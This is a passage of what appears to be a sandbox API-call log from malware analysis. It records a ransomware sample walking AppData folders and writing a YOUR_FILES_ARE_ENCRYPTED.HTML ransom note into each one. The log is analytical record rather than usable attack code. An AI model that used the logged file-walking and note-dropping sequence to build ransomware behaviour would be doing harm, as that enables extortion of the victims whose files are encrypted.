ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.833] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 1 [0114.833] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 0 [0114.833] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.834] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0114.834] GetProcessHeap () returned 0x600000 [0114.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.835] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.836] CloseHandle (hObject=0x320) returned 1 [0114.836] GetProcessHeap () returned 0x600000 [0114.836] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.836] GetProcessHeap () returned 0x600000 [0114.836] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.837] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0114.837] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.837] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies") returned 100 [0114.837] GetProcessHeap () returned 0x600000 [0114.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.839] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies" [0114.839] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0114.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.839] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 1 [0114.839] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 0 [0114.840] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.840] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0114.840] GetProcessHeap () returned 0x600000 [0114.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.841] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.842] CloseHandle (hObject=0x320) returned 1 [0114.842] GetProcessHeap () returned 0x600000 [0114.842] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.842] GetProcessHeap () returned 0x600000 [0114.842] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.843] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0114.843] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.843] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory") returned 100 [0114.843] GetProcessHeap () returned 0x600000 [0114.843] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.844] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory" [0114.844] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0114.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0114.845] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 1 [0114.845] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 0 [0114.845] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0114.845] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0114.845] GetProcessHeap () returned 0x600000 [0114.845] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.846] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.847] CloseHandle (hObject=0x320) returned 1 [0114.847] GetProcessHeap () returned 0x600000 [0114.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.847] GetProcessHeap () returned 0x600000 [0114.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.848] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="Temp", cAlternateFileName="")) returned 1 [0114.848] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.848] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp") returned 93 [0114.848] GetProcessHeap () returned 0x600000 [0114.848] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.849] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp" [0114.849] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp\\*" [0114.849] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.850] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 1 [0114.850] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0e28, dwReserved1=0x3187cf8, cFileName="..", cAlternateFileName="")) returned 0 [0114.850] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.850] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0114.850] GetProcessHeap () returned 0x600000 [0114.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.851] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.852] CloseHandle (hObject=0x320) returned 1 [0114.852] GetProcessHeap () returned 0x600000 [0114.852] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.852] GetProcessHeap () returned 0x600000 [0114.852] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.853] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="Temp", cAlternateFileName="")) returned 0 [0114.853] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0114.853] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0114.853] GetProcessHeap () returned 0x600000 [0114.853] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.854] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.855] CloseHandle (hObject=0x32c) returned 1 [0114.855] GetProcessHeap () returned 0x600000 [0114.855] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.855] GetProcessHeap () returned 0x600000 [0114.855] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.856] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3405126d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3405126d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0114.856] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.856] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData") returned 93 [0114.856] GetProcessHeap () returned 0x600000 [0114.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.857] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData" [0114.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData\\*" [0114.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3405126d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3405126d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.857] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3405126d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3405126d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0114.857] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3405126d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3405126d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3405126d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0114.857] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.857] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0114.857] GetProcessHeap () returned 0x600000 [0114.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 